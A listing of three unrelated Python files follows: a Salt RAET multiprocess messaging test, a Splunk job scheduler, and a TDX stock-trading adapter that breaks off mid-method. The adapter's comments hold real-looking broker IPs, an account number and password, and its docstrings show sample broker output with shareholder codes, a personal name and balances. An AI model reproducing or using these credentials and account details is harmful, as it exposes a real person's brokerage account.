source | python
|---|---|
forking.py
|
# -*- coding: utf-8 -*-
'''
Test basic uxd stacking and yarding with multiple processes
'''
import multiprocessing
import time
from salt.transport.road.raet import stacking
from salt.transport.road.raet import yarding
ESTATE = 'minion1'
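# Messages exchanged below are plain dicts of the form
# {'route': {'src': (estate, yard_name, None), 'dst': (estate, yard_name, None)}, 'stuff': <payload>}
# (see fudal(), lord() and serf()).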
def fudal():
'''
Make a single process raet uxd stack
'''
lord_stack = stacking.StackUxd(name='lord', lanename='execute', yid=0, dirpath='/tmp')
serf_stack = stacking.StackUxd(name='serf', lanename='execute', yid=1, dirpath='/tmp')
lord_yard = yarding.RemoteYard(yid=0, prefix='execute', dirpath='/tmp')
#serf_yard = yarding.Yard(name=serf_stack.yard.name, prefix='execute')
serf_stack.addRemoteYard(lord_yard)
#print 'stack: {0}\nyid: {1}\nname: {2}\nha: {3}\ndirpath: {4}'.format(lord_stack.yard.stack, lord_stack.yard.yid, lord_stack.yard.name, lord_stack.yard.ha, lord_stack.yard.dirpath)
#lord_stack.addRemoteYard(serf_yard)
src = (ESTATE, serf_stack.yard.name, None)
dst = (ESTATE, lord_stack.yard.name, None)
route = {'src': src, 'dst': dst}
msg = {'route': route, 'stuff': 'Serf to Lord, I am not a couch'}
serf_stack.transmit(msg=msg)
serf_stack.serviceAll()
lord_stack.serviceAll()
#print lord_stack.rxMsgs
def lord(serfs=5):
'''
Make a lord that can spawn serfs
'''
lord_yid = 0
dirpath = '/tmp'
lord_stack = stacking.StackUxd(name='lord', lanename='execute', yid=lord_yid, dirpath=dirpath)
lord_stack.serviceAll()
for serf_id in range(1, serfs + 1):
serf_yard = yarding.RemoteYard(yid=serf_id, prefix='execute', dirpath=dirpath)
lord_stack.addRemoteYard(serf_yard)
proc = multiprocessing.Process(target=serf, args=(lord_stack.yard.name, lord_yid, serf_id, dirpath))
proc.start()
while True:
lord_stack.serviceAll()
print 'serviced lord stack'
print lord_stack.rxMsgs
while lord_stack.rxMsgs:
rxmsg = lord_stack.rxMsgs.popleft()
print rxmsg
src = (ESTATE, lord_stack.yard.name, None)
dst = (ESTATE, rxmsg['route']['src'][1], None)
route = {'src': src, 'dst': dst}
msg = {'route': route, 'stuff': 'Master to Serf {0}, you stay'.format(rxmsg['route']['src'][1])}
lord_stack.transmit(msg)
print lord_stack.yards
time.sleep(1)
def serf(lord_name, lord_yid, id_, dirpath):
'''
Call to spawn a serf and start sending messages
'''
serf_stack = stacking.StackUxd(
name='serf{0}'.format(id_),
lanename='execute',
yid=id_,
dirpath=dirpath)
lord_yard = yarding.RemoteYard(yid=lord_yid, prefix='execute', dirpath=dirpath)
serf_stack.addRemoteYard(lord_yard)
src = (ESTATE, serf_stack.yard.name, None)
dst = (ESTATE, lord_name, None)
route = {'src': src, 'dst': dst}
msg = {'route': route, 'stuff': 'Serf {0} to Lord, I am not a couch'.format(id_)}
while True:
serf_stack.transmit(msg=msg)
serf_stack.serviceAll()
print 'serf messages transmitted'
while serf_stack.rxMsgs:
print serf_stack.rxMsgs.popleft()
time.sleep(1)
if __name__ == '__main__':
lord()
#fudal()
|
scheduler.py
|
# SPDX-FileCopyrightText: 2020 Splunk Inc.
#
# SPDX-License-Identifier: Apache-2.0
from future import standard_library
standard_library.install_aliases()
from builtins import object
import threading
from time import time
import random
import queue
from splunktalib.common import log
class Scheduler(object):
"""
A simple scheduler that schedules periodic or one-shot events
"""
import sortedcontainers as sc
max_delay_time = 60
def __init__(self):
self._jobs = Scheduler.sc.SortedSet()
self._wakeup_q = queue.Queue()
self._lock = threading.Lock()
self._thr = threading.Thread(target=self._do_jobs)
self._thr.daemon = True
self._started = False
def start(self):
"""
Start the scheduler, which starts the internal thread that schedules
jobs. Call tear_down when cleaning up.
"""
if self._started:
log.logger.info("Scheduler already started.")
return
self._started = True
self._thr.start()
def tear_down(self):
"""
Stop the scheduler, which stops the internal thread that schedules
jobs.
"""
if not self._started:
log.logger.info("Scheduler already torn down.")
return
self._wakeup_q.put(True)
def _do_jobs(self):
while 1:
(sleep_time, jobs) = self.get_ready_jobs()
self._do_execution(jobs)
try:
done = self._wakeup_q.get(timeout=sleep_time)
except queue.Empty:
pass
else:
if done:
break
self._started = False
log.logger.info("Scheduler exited.")
def get_ready_jobs(self):
"""
@return: a 2-element tuple. The first element is the sleep duration
until the next job is due; the second is the list of jobs ready to run now.
"""
now = time()
ready_jobs = []
sleep_time = 1
with self._lock:
job_set = self._jobs
total_jobs = len(job_set)
for job in job_set:
if job.get_expiration() <= now:
ready_jobs.append(job)
if ready_jobs:
del job_set[: len(ready_jobs)]
for job in ready_jobs:
if job.get_interval() != 0 and not job.stopped():
# repeated job, calculate next due time and enqueue
job.update_expiration()
job_set.add(job)
if job_set:
sleep_time = job_set[0].get_expiration() - now
if sleep_time < 0:
log.logger.warn("Scheduler saturation, sleep_time=%s", sleep_time)
sleep_time = 0.1
if ready_jobs:
log.logger.info(
"Get %d ready jobs, next duration is %f, "
"and there are %s jobs scheduling",
len(ready_jobs),
sleep_time,
total_jobs,
)
ready_jobs.sort(key=lambda job: job.get("priority", 0), reverse=True)
return (sleep_time, ready_jobs)
def add_jobs(self, jobs):
with self._lock:
now = time()
job_set = self._jobs
for job in jobs:
delay_time = random.randrange(0, self.max_delay_time)
job.set_initial_due_time(now + delay_time)
job_set.add(job)
self._wakeup()
def update_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
job_set.discard(njob)
job_set.add(njob)
self._wakeup()
def remove_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
njob.stop()
job_set.discard(njob)
self._wakeup()
def number_of_jobs(self):
with self._lock:
return len(self._jobs)
def disable_randomization(self):
self.max_delay_time = 1
def _wakeup(self):
self._wakeup_q.put(None)
def _do_execution(self, jobs):
for job in jobs:
job()
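# --- Usage sketch (not part of the original module; illustrative only) ---
# The Scheduler above never defines a job type; it only calls a handful of
# methods on whatever objects it is given. The class below is a minimal,
# hypothetical job satisfying that implicit interface, inferred from the calls
# made in get_ready_jobs/add_jobs/_do_execution: get_expiration(),
# get_interval(), update_expiration(), set_initial_due_time(), stop(),
# stopped(), a dict-style get("priority", 0), being callable, and being
# hashable/orderable so it can live in the sortedcontainers.SortedSet.
class ExampleJob(object):
    def __init__(self, name, interval, func):
        self._name = name
        self._interval = interval  # 0 means run once, otherwise repeat every N seconds
        self._func = func
        self._due = 0
        self._stopped = False

    # ordering and hashing so the job can be stored in the SortedSet
    def __lt__(self, other):
        return (self._due, self._name) < (other._due, other._name)

    def __eq__(self, other):
        return isinstance(other, ExampleJob) and self._name == other._name

    def __hash__(self):
        return hash(self._name)

    def get(self, key, default=0):
        # get_ready_jobs() sorts ready jobs by job.get("priority", 0)
        return default

    def get_expiration(self):
        return self._due

    def get_interval(self):
        return self._interval

    def set_initial_due_time(self, due):
        self._due = due

    def update_expiration(self):
        self._due += self._interval

    def stop(self):
        self._stopped = True

    def stopped(self):
        return self._stopped

    def __call__(self):
        self._func()


# Possible usage (sketch):
# scheduler = Scheduler()
# scheduler.start()
# scheduler.add_jobs([ExampleJob("heartbeat", 10, lambda: log.logger.info("tick"))])
# ...
# scheduler.tear_down()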
|
tdx.py
|
#coding:utf-8
"""
tradex market-data and trading adapter
"""
"""
Quantitative technical-indicator calculation
https://github.com/QUANTAXIS/QUANTAXIS/blob/master/QUANTAXIS/QAData/base_datastruct.py
"""
import copy
import time,datetime
import traceback
import threading
from collections import OrderedDict
from functools import partial
from dateutil.parser import parse
from mantis.sg.fisher.utils.importutils import import_module,import_class
from mantis.sg.fisher.utils.useful import singleton
from mantis.sg.fisher.utils.timeutils import timestamp_to_str
from mantis.sg.fisher import stbase,stutils
import TradeX2
#
# TDX_CFGS = dict(
# qsid = 36,
# host = "222.173.22.53",
# port = 7700,
# version = "2.03",
# branch_id = 0,
# account_type = 0,
# account_no = "100201003789",
# trade_account_no = "100201003789",
# password = "171025",
# tx_password = "",
# client_account = "100201003789",
# broker_account = "100201003789"
# )
#
#
# TDX_CFGS_TRADE = dict(
# qsid = 36,
# host = "58.57.121.98",
# port = 7700,
# version = "2.13",
# branch_id = 0,
# account_type = 0,
# account_no = "100201003789",
# trade_account_no = "100201003789",
# password = "171025",
# tx_password = "",
# client_account = "100201003789",
# broker_account = "100201003789"
# )
#
# # Zhongtai Securities express (XTP) channel
# TDX_CFGS_TRADE_XTP = dict(
# qsid = 36,
# host = "222.173.22.75",
# port = 7888,
# version = "6.11",
# branch_id = 0,
# account_type = 8,
# account_no = "100201003789",
# trade_account_no = "100201003789",
# password = "171025",
# tx_password = "",
# client_account = "100201003789",
# broker_account = "100201003789"
# )
Market_SH = 1
Market_SZ = 0
Market_NULL = 99
def getMaketTypeByCode(code):
if not code:
return Market_NULL
if code[0] in ('0','3'):
return Market_SZ
return Market_SH
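# e.g. getMaketTypeByCode('000001') or getMaketTypeByCode('300750') -> Market_SZ,
#      getMaketTypeByCode('600000') -> Market_SH, getMaketTypeByCode('') -> Market_NULL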
class TDX_StockMarket(stbase.Market):
"""行情接口"""
def __init__(self):
# self.ctx = {}
self.hq_conn = None
stbase.Market.__init__(self, None)
self.logger = None
self.cfgs = { 'query_freq':.5}
# self.cfgs.update(TDX_CFGS)
self.tick_codes = {} # {code:{last:???} }
self.bar_last_data = {} # { code-cycle:??? } dedup bookkeeping: remembers the latest bar record
self.bar_codes= {
"1m":[],
"5m":[],
"15m":[],
"30m":[],
"60m":[],
"d":[]
}
# self.codes =[] # list of subscribed stock codes
self.thread_quotes = threading.Thread(target=self.quotesThread)
def init(self,*args, **kwargs ):
"""
host : quote server address
port : quote server port
:return:
"""
self.logger = stbase.controller.getLogger()
self.cfgs.update(kwargs)
stbase.Market.init(self)
return self
def open(self):
if not self.connectQuoteServer():
return False
stbase.Market.open(self)
self.thread_quotes.start()
return True
def connectQuoteServer(self):
self.hq_conn = None
try:
host = self.cfgs.get('quote_host')
port = self.cfgs.get('quote_port')
self.logger.info('Connect To HQ server..')
self.hq_conn = TradeX2.TdxHq_Connect(host, port)
except TradeX2.TdxHq_error, e:
self.logger.error( e.message.decode('gbk').encode('utf8') )
self.logger.info('HQ Server Connected.')
return self.hq_conn
def close(self):
stbase.Market.close(self)
self.thread_quotes.join()
def quotesThread(self):
"""行情查询 线程"""
freqs = self.cfgs.get('query_freq')
while self.actived:
time.sleep(freqs)
try:
if not self.hq_conn:
self.connectQuoteServer()
self.quoteBar()
self.quoteTick()
except:
self.hq_conn = None
self.logger.error( traceback.format_exc() )
def quoteTick(self):
"""分时数据"""
qs = []
if not self.tick_codes:
return
for code in self.tick_codes.keys():
qs.append( (getMaketTypeByCode(code),code) )
# query quote records
errinfo, count, result = self.hq_conn.GetSecurityQuotes(qs)
if errinfo != "":
print errinfo.decode('gbk')
self.hq_conn = None
else:
# print count
lines = result.decode('gbk').split("\n")
# print lines[0]
for line in lines[1:]:
# print line
self.on_tick(line.split())
def quoteBar(self):
"""查询k线"""
cycle_cat_map = {
'1m': 8,
'5m': 0,
'15m': 1,
'30m': 2,
'60m': 3,
'd': 4,
'w': 5,
'm': 6,
'q': 10,
'y': 11
}
for k,codes in self.bar_codes.items():
for code in codes:
cat = cycle_cat_map[k]
market = getMaketTypeByCode(code)
# fetch the latest bar
errinfo, count, result = self.hq_conn.GetSecurityBars(cat,market,code,0,2)
if errinfo != "":
print errinfo.decode('gbk')
self.hq_conn = None
else:
# print result.decode('gbk')
lines = result.decode('gbk').split("\n")
# print lines[0]
for line in lines[1:2]: # exclude the still-changing bar of the current minute
# print line
self.on_bar(code,k,line.split('\t'))
def initTradeObject(self,stock):
"""
:param stock: stbase.TradeObject
:return:
"""
# initialize the stock's basic parameters: price limits, commission, etc.
if stock.inited:
return
# stk = self.ctx.Market.Stk(stock.code)
#
# stock.max_price = stk.MaxOrderPrice
# stock.min_price = stk.MinOrderPrice
# stock.stk = stk
stock.inited = True
return stock
def getHistoryBars(self,code,cycle='1m',limit=100,inc_last=False):
"""获取历史k线
剔除最后一根活动k线(盘中不能使用最后一根k线,或许是未完成计算的中间结果)
result 以时间升序排列
"""
result = [] # stbase.BarData()
stock= self.product.getOrNewTradeObject(code)
cycle_cat_map = {
'1m': 8,'5m': 0,'15m': 1,
'30m': 2,'60m': 3,'d': 4,
'w': 5,'m': 6,'q': 10,
'y': 11
}
cat = cycle_cat_map[cycle]
market = getMaketTypeByCode(code)
errinfo, count, text = self.hq_conn.GetSecurityBars(cat, market, code, 0, limit+1)
if errinfo != "":
print errinfo.decode('gbk')
self.hq_conn = None
else:
lines = text.decode('gbk').split("\n")
# print lines[0]
for line in lines[1:-1]: # exclude the still-changing bar of the current minute
data = self.barWrapped(code, cycle, line.split('\t'))
result.append(data)
return result
def getYdClosePrice(self,code):
"""查詢昨日 收盤價
? 如果盤后查詢,則取最後一根而不是倒數第二
"""
stock = stbase.stocks.getTradeObject(code)
return stock.yd_close
# if not stutils.Stocks.in_trading_time():
# stbase.println(" not in trading time ..")
# return self.getHistoryBars(code,'d', 2,True)[-1].Close
# return self.getHistoryBars(code,'d', 2)[-1].Close
def subReset(self):
stbase.Market.subReset(self)
self.tick_codes = {}
self.bar_codes = {
"1m":[],
"5m":[],
"15m":[],
"30m":[],
"60m":[],
"d":[]
}
self.bar_last_data = {}
return self
def subTick(self, code, handler):
"""订阅分时行情"""
stock = stbase.Market.subTick(self, code, handler)
# stock.stk.OnTick += partial(self.on_tick, stock)
self.tick_codes[code]= {'last':None}
return stock
def subBar(self,code,handler,cycle='1m'):
"""订阅不同周期的k线事件"""
stock = stbase.Market.subBar(self, code, handler, cycle)
self.bar_codes[cycle].append(code)
name ='{}-{}'.format(code,cycle)
self.bar_last_data[name] = {'last':None}
return stock
# market code activity last-price(3) prev-close open high low(7) reserved reserved total-volume(10) current-volume(11) total-amount(12) inner-volume(13) outer-volume(14) reserved reserved bid1-price(17) ask1-price bid1-qty ask1-qty(20) bid2-price ask2-price bid2-qty ask2-qty bid3-price(25) ask3-price bid3-qty ask3-qty bid4-price ask4-price(30) bid4-qty ask4-qty bid5-price ask5-price bid5-qty(35) ask5-qty reserved reserved reserved reserved(40) reserved price-speed activity(43)
#0 002517 3201 4.980000 5.070000 5.080000 5.080000 4.840000 14330103 -498 481362 37 238152352.000000 286382 194980 -1 10460 4.980000 4.990000 614 1192 4.970000 5.000000 2051 2672 4.960000 5.010000 1976 3221 4.950000 5.020000 1312 2015 4.940000 5.030000 430 1547 1593 0 30 24 -1 0.610000 3201
def on_tick(self, qs):
"""行情进入,生成 TickData()对象,推送到 stbase.Market的处理工作队列
主动查询需要控制tick上报时消重
"""
code = qs[1]
last = self.tick_codes[code].get('last')
current = ','.join(qs)
if last == current:
# print 'duplicated tick.'
return
self.tick_codes[code]['last'] = current
vs = map(float, qs)
data = stbase.TickData()
data.code = code
data.trade_object = stbase.stocks.getOrNewTradeObject(code)
data.sys_time = datetime.datetime.now()
price = data.price
price.time = data.sys_time
price.last = vs[3]
price.yd_close = vs[4]
price.qty = vs[11]
price.amount = 0
price.total_qty = vs[10]
price.total_amount = vs[12]
price.diff = price.last - price.yd_close # current price change vs. yesterday's close
price.diff_rate = price.diff/(price.yd_close*1.0)
price.sell_1 = vs[18]
price.sell_2 = vs[22]
price.sell_3 = vs[26]
price.sell_4 = vs[30]
price.sell_5 = vs[34]
price.sell_qty_1 = vs[20]
price.sell_qty_2 = vs[24]
price.sell_qty_3 = vs[28]
price.sell_qty_4 = vs[32]
price.sell_qty_5 = vs[36]
price.buy_1 = vs[17]
price.buy_2 = vs[21]
price.buy_3 = vs[25]
price.buy_4 = vs[29]
price.buy_5 = vs[33]
price.buy_qty_1 = vs[19]
price.buy_qty_2 = vs[23]
price.buy_qty_3 = vs[27]
price.buy_qty_4 = vs[31]
price.buy_qty_5 = vs[35]
data.trade_object.price = data.price
self.putData(data) # enqueue for the worker thread to pick up
def barWrapped(self,code,cycle,kdata):
name = '{}-{}'.format(code, cycle)
last = self.bar_last_data[name].get('last')
current = ','.join(kdata)
if last == current:
return
self.bar_last_data[name]['last'] = current
dt = kdata[0]
dt = parse(dt)
nums = kdata[1:]
nums = map(float, nums)
data = stbase.BarData()
data.amount = nums[5]
data.open = nums[0]
data.high = nums[2]
data.low = nums[3]
data.close = nums[1]
data.vol = nums[4]
data.time = dt
data.sys_time = datetime.datetime.now()
data.code = code
data.trade_object = stbase.stocks.getTradeObject(code)
data.cycle = cycle
return data
def on_bar(self,code,cycle,kdata):
"""k线数据触发, 消重处理"""
# data.num = num # highest bar sequence number
data = self.barWrapped(code,cycle,kdata)
self.putData(data)
class TDX_StockTrader(stbase.Trader):
"""股票交易接口"""
def __init__(self):
stbase.Trader.__init__(self)
self.trade_conn = None # trading connection
self.logger = None
self.cfgs = {'query_freq': .5}
# self.cfgs.update(TDX_CFGS_TRADE)
self.thread_query = threading.Thread(target=self.queryThread)
self.actived = False
self.position_list = {} # position records
self.gddm_list = {} # shareholder account codes (gddm)
self.orders = {} # open (pending) orders
def init(self,*args,**kwargs):
self.logger = stbase.controller.getLogger()
self.cfgs.update(kwargs)
stbase.Trader.init(self,**kwargs)
return self
def open(self):
# start quote reception
# if not self.connectServer():
# return False
#
self.connectServer()
stbase.Trader.open(self)
self.thread_query.start()
return True
def close(self):
self.actived = False
self.thread_query.join()
def wait_for_shutdown(self,inf = 1000*1000):
time.sleep(inf)
def connectServer(self):
self.trade_conn = None
try:
host = self.cfgs.get('host')
port = self.cfgs.get('port')
qsid = self.cfgs.get('qsid')
version = self.cfgs.get('version')
branch_id = self.cfgs.get('branch_id')
account_type = self.cfgs.get('account_type')
account_no = self.cfgs.get('account_no')
trade_account_no = self.cfgs.get('trade_account_no')
password = self.cfgs.get('password')
tx_password = self.cfgs.get('tx_password')
client_account = self.cfgs.get('client_account')
broker_account = self.cfgs.get('broker_account')
self.logger.info('Connect To HQ server..')
TradeX2.OpenTdx(14, "6.40", 12, 0)
self.trade_conn = TradeX2.Logon(qsid, host, port, version, branch_id, account_type, client_account, broker_account,
password, tx_password)
except TradeX2.error, e:
print e.message.decode('gbk')
self.logger.error(e.message.decode('gbk').encode('utf8'))
return None
self.logger.info('HQ Server Connected.')
return self.trade_conn
def queryThread(self):
"""查询持仓、资金、委托"""
self.actived = True
freqs = self.cfgs.get('query_freq')
while self.actived:
time.sleep(freqs)
try:
if not self.trade_conn:
self.connectServer()
self.queryDatas()
except:
self.trade_conn = None
self.logger.error(traceback.format_exc())
def queryDatas(self):
"""
Query positions, orders, entrusts, and other account information
:return:
"""
# 0 funds
# 1 holdings
# 2 today's orders
# 3 today's fills
# 4 cancelable orders
# 5 shareholder codes
# 6 margin financing balance
# 7 securities lending balance
# 8 marginable securities
categories = ( 0, 1,2,3,4,5)
categories = ( 0,1,2,3,4,5 )
categories = ( 0,1,4,5)
# categories = ( 5,)
functions = {
0 : self.query_resp_funds,
1 : self.query_resp_postions,
# 2 : self.query_resp_today_orders,
4 : self.query_resp_cancelable_orders,
5: self.query_resp_gddm
}
# status, content = self.trade_conn.QueryDatas(categories)
# if status < 0:
# print content.decode('gbk')
# self.trade_conn = None # force a reconnect
# else:
# for elem in content:
for n in categories:
if n == 5 and self.gddm_list: # shareholder codes already fetched; skip
continue
errinfo, result = self.trade_conn.QueryData(n)
if errinfo :
print errinfo.decode('gbk')
# self.trade_conn = None # force a reconnect
else:
# print n
# print result.decode('gbk')
lines = result.decode('gbk').split("\n")
functions[n](lines[1:])
def get_field_value(self,value,def_=0):
value = value.strip()
ret = def_
# print 'get_value:' , value
if value:
ret = float(value)
return ret
def query_resp_today_orders(self,lines):
"""查询当日委托"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.orders = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
order = stbase.OrderRecord()
order.code = fs[11]
order.name = fs[0]
order.gddm = fs[12]
order.direction = stbase.Constants.Buy
if fs[1] == u'卖':
order.direction = stbase.Constants.Sell
order.order_id = fs[9]
order.trans_id = ''
order.order_price = self.get_field_value(fs[3])
order.order_qty = int(self.get_field_value(fs[4]))
order.qty_filled = int(self.get_field_value(fs[6]))
order.qty_withdraw = 0 # int(self.get_field_value(fs[11]))
self.orders[order.order_id] = order
"""
- 东方证券 -
证券名称0 买卖标志1 买卖标志2 委托价格3 委托数量4 成交均价5 成交数量6 状态说明7 委托时间8 委托编号9 申报序号10 证券代码11 股东代码12 帐号类别13 备注 可撤单标志 交易所代码 撤单数量 委托属性 委托状态 保留信息
恺英网络 买 0 4.550 400 4.550 400 已成交 09:30:55 167 H700000032 002517 0261758179 0 0 2 0 已成交
恺英网络 卖 1 4.680 400 4.680 400 已成交 09:47:40 170 H700000108 002517 0261758179 0 0 2 0 已成交
恺英网络 卖 1 5.000 200 0.000 0 场内撤单 09:58:58 172 H700000151 002517 0261758179 0 0 2 200 场内撤单
辰欣药业 卖 1 18.170 200 18.170 200 已成交 10:03:01 174 0600000314 603367 A451079901 1 0 1 0 已成交
恺英网络 买 0 4.480 200 0.000 0 未成交 14:31:17 178 H700000431 002517 0261758179 0 1 2 0 已报
恺英网络 卖 1 4.830 200 0.000 0 未成交 14:48:03 182 H700000473 002517 0261758179 0 1 2 0 已报
"""
def query_resp_cancelable_orders(self,lines):
"""查询可撤销的委托"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.orders = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
# for i, _ in enumerate(fs):
# print i, _.encode('utf-8')
if self.cfgs.get('broker_name') == 'AIJIAN':
order = stbase.OrderRecord()
order.code = fs[1]
order.name = fs[2]
order.gddm = fs[13]
order.direction = stbase.Constants.Buy
if fs[4] == u'卖出':
order.direction = stbase.Constants.Sell
order.order_id = fs[8]
order.trans_id = ''
order.order_price = self.get_field_value(fs[6])
order.order_qty = int(self.get_field_value(fs[7]))
order.qty_filled = int(self.get_field_value(fs[10]))
order.qty_withdraw = int(self.get_field_value(fs[11]))
self.orders[order.order_id] = order
# print order.dict()
"""
0 09:52:30
1 002517
2 恺英网络
3 0
4 买入
5 已报
6 3.7000
7 200
8 51
9 0.0000
10 0
11 0
12 买卖
13 0237617162
14 委托
15 0
16 0
17
18 08D92910
"""
if self.cfgs.get('broker_name') == 'DONGFANG':
order = stbase.OrderRecord()
order.code = fs[11]
order.name = fs[0]
order.gddm = fs[12]
order.direction = stbase.Constants.Buy
if fs[1] == u'卖':
order.direction = stbase.Constants.Sell
order.order_id = fs[9]
order.trans_id = ''
order.order_price = self.get_field_value(fs[3])
order.order_qty = int(self.get_field_value(fs[4]))
order.qty_filled = int(self.get_field_value(fs[6]))
order.qty_withdraw = 0 #int(self.get_field_value(fs[11]))
self.orders[order.order_id] = order
# print order.dict()
# print 'query order cancellable end.'
"""
** 注意 : 不同的证券通道返回的格式均不同
- 东方证券 -
证券名称0 买卖标志1 买卖标志2 委托价格3 委托数量4 成交价格5 成交数量6 状态说明7 委托时间8 委托编号9 申报序号10 证券代码11 股东代码12 帐号类别13 备注 交易所代码 委托状态 保留信息
恺英网络 卖 1 5.000 200 0.000 0 未成交 09:58:58 172 H700000151 002517 0261758179 0 2 已报
"""
"""
委托日期0 委托时间1 证券代码2 证券名称3 状态说明4 买卖标志5
买卖标志6 委托价格7 委托数量8 委托编号9 成交数量10 撤单数量11 股东代码12 帐号类别13
资金帐号14 备注 句柄 保留信息
"""
def query_resp_gddm(self,lines):
"""股东代码查询返回"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.gddm_list = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
name = fs[0]
type_ = int(fs[2])
# for i, _ in enumerate(fs):
# print i, _.encode('utf-8')
self.gddm_list[type_] = fs[0]
# _ = self.gddm_list.get(type_)
# if not _:
# self.gddm_list[type_] = []
# _ = self.gddm_list.get(type_)
#
# type_.append( fs[0])
# print self.gddm_list
"""
- 东方证券 -
股东代码0 股东名称1 帐号类别2 资金帐号3 指定交易4 保留信息
A451079901 XXX 1 06034051 0
0261758179 XXX 0 06034051 0
- 中泰证券 -
股东代码0 股东名称1 帐号类别2 资金帐号3 融资融券标识4 指定交易5 句柄 保留信息
0252085695 孙鹏 0 0 0 0 0741E2D0 主股东
A338780150 孙鹏 1 0 0 1 0741E2D0 主股东
0571803172 孙鹏 0 0 0 0 0741E2D0
F138928144 孙鹏 1 0 0 1 0741E2D0
"""
def query_resp_postions(self,lines):
"""持仓返回"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.position_list = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
# for i,_ in enumerate(fs):
# print i , _.encode('utf-8')
if self.cfgs.get('broker_name') == 'AIJIAN':
pos = TdxPosition()
pos.code = fs[0]
pos.name = fs[1]
pos.qty_current = self.get_field_value(fs[2])
pos.qty_pos = pos.qty_current
# pos.qty_td = pos.qty_current
pos.qty_yd = self.get_field_value(fs[3])
pos.qty_td = pos.qty_current - pos.qty_yd
pos.last_price = self.get_field_value(fs[7])
pos.gddm = fs[10]
self.position_list[pos.code] = pos
# print pos.dict()
"""
0 002517
1 恺英网络
2 700
3 200
4 -62.940
5 3.999
6 -1.98
7 3.920
8 2744.000
9 深圳A股
10 0237617162
11 0
12 0
13 16711680
14
15 08D4DA28
"""
if self.cfgs.get('broker_name') == 'DONGFANG':
pos = TdxPosition()
pos.code = fs[0]
pos.name = fs[1]
pos.qty_current = self.get_field_value(fs[2])
pos.qty_yd = self.get_field_value(fs[4])
pos.last_price = self.get_field_value(fs[8])
pos.gddm = fs[12]
self.position_list[pos.code] = pos
# print pos.dict()
"""
- 爱建证券 -
证券名称 证券数量 可卖数量 成本价 浮动盈亏 盈亏比例(%) 最新市值 当前价 今买数量 今卖数量 证券代码 股东代码 帐号类别 交易所代码 备注 保留信息
恺英网络 4200 2900 4.219 -1255.000 -7.09 16464.000 3.920 002517 0261758179 0 0 开仓证券
- 东方证券 -
证券名称 证券数量 可卖数量 成本价 浮动盈亏 盈亏比例(%) 最新市值 当前价 今买数量 今卖数量 证券代码 股东代码 帐号类别 交易所代码 备注 保留信息
辰欣药业 0 0 0.000 -50.780 0.00 0.000 18.420 603367 A451079901 1 1 开仓证券
恺英网络 600 0 7.016 -1305.460 -31.01 2904.000 4.840 002517 0261758179 0 0 开仓证券
- 中泰证券 -
18
证券代码0 证券名称1 证券数量2 库存数量3 可卖数量4 余券数量5 参考成本价6 盈亏成本价7 当前价8 参考市值9 参考盈亏10 参考盈亏比例(%)11 股东代码12 帐号类别13 交易所代码14 资金帐号15 交易所名称16 句柄 保留信息
600010 包钢股份 100 100 100 1.840 1.840 1.790 179.000 -5.000 -2.72 A338780150 1 1 100201003789 上海A股 073F5720
"""
def query_resp_funds(self, lines):
"""资金返回"""
lines = map(lambda _:_.strip(),lines)
lines = filter(lambda _:_,lines)
for line in lines:
fs = line.strip().split('\t')
# print len(fs)
# for i, _ in enumerate(fs):
# print i, _.encode('utf-8')
if self.cfgs.get('broker_name') == 'AIJIAN':
if fs[0] == '0': # RMB
self.stat.balance = self.get_field_value(fs[1])
self.stat.usable_amount = self.get_field_value(fs[2])
self.stat.frozen_amount = 0 # self.get_field_value(fs[4])
self.stat.drawable_amount = self.get_field_value(fs[4])
self.stat.reference_value = self.get_field_value(fs[6])
self.stat.asset_amount = self.get_field_value(fs[5])
"""
0 0
1 39027.39
2 37057.29
3 0.00
4 37057.29
5 39801.29
6 2744.00
7
8 08C3ECD8
"""
if self.cfgs.get('broker_name') == 'DONGFANG':
if fs[0] == '0': # RMB
self.stat.balance = self.get_field_value(fs[1])
self.stat.usable_amount = self.get_field_value(fs[2])
self.stat.frozen_amount = self.get_field_value(fs[3])
self.stat.drawable_amount = self.get_field_value(fs[5])
self.stat.reference_value = 0 # self.get_field_value(fs[6])
self.stat.asset_amount = self.get_field_value(fs[4])
# self.stat.frozen_buy = self.get_field_value(fs[8])
# self.stat.frozen_sell = self.get_field_value(fs[9])
"""
- 东方证券 -
币种0 资金余额1 可用资金2 冻结资金3 总资产4 可取资金5 融资金额6 模式7 最新市值8 融资负债 融券负债 保留信息
0 7034.290 9798.720 901.000 13591.720 7034.290 0 2892.000 0.000 0.000
1 0.000 0.000 0.000 0.000 0.000 0 0.000 0.000 0.000
2 0.000 0.000 0.000 0.000 0.000 0 0.000 0.000 0.000
- 中泰证券 -
资金帐号0 币种1 资金余额2 可用资金3 冻结资金4 可取资金5 参考市值6 总资产7 买入冻结资金8 卖出冻结资金9 取柜台可买数量10 账户信用值11 可用信用额度12 句柄 保留信息
100201003789 0 750.71 0.00 0.00 750.71 750.71 0.00 0 0741DFC0
"""
def onRtsChanged(self,rts_list):
"""委托或成交回报"""
fmt = '%Y-%m-%d %H:%M:%S'
tr_list = []
for _ in rts_list:
tr = stbase.TradeReturn()
tr.type = _.Type
tr.order_id = _.OrigSerialNo
tr.user_id = _.OrigSource
tr.protfolio_num = _.PortfolioNum
tr.code = _.ServerCode
tr.direction = stbase.Constants.Buy
if _.BSType == 'S':
tr.direction = stbase.Constants.Sell
tr.oc = stbase.Constants.Open
if _.OCFlag == 'C':
tr.oc = stbase.Constants.Cover
tr.order_price = _.OrderPrice
tr.order_qty = _.OrderQty
# print _.OrderTime,type(_.OrderTime)
if _.OrderTime:
tr.order_time = datetime.datetime.fromtimestamp(_.OrderTime)
if _.KnockTime:
tr.knock_time = datetime.datetime.fromtimestamp(_.KnockTime)
tr.knock_code = _.KnockCode
tr.knock_price = _.KnockPrice
tr.knock_qty = _.KnockQty
tr.knock_amount = _.KnockAmt
tr.total_withdraw_qty = _.TotalWithdrawQty
tr.total_knock_qty = _.TotalKnockQty
tr.total_knock_amount = _.TotalKnockAmt
tr.status = stbase.Constants.OrderStatus.Unknown
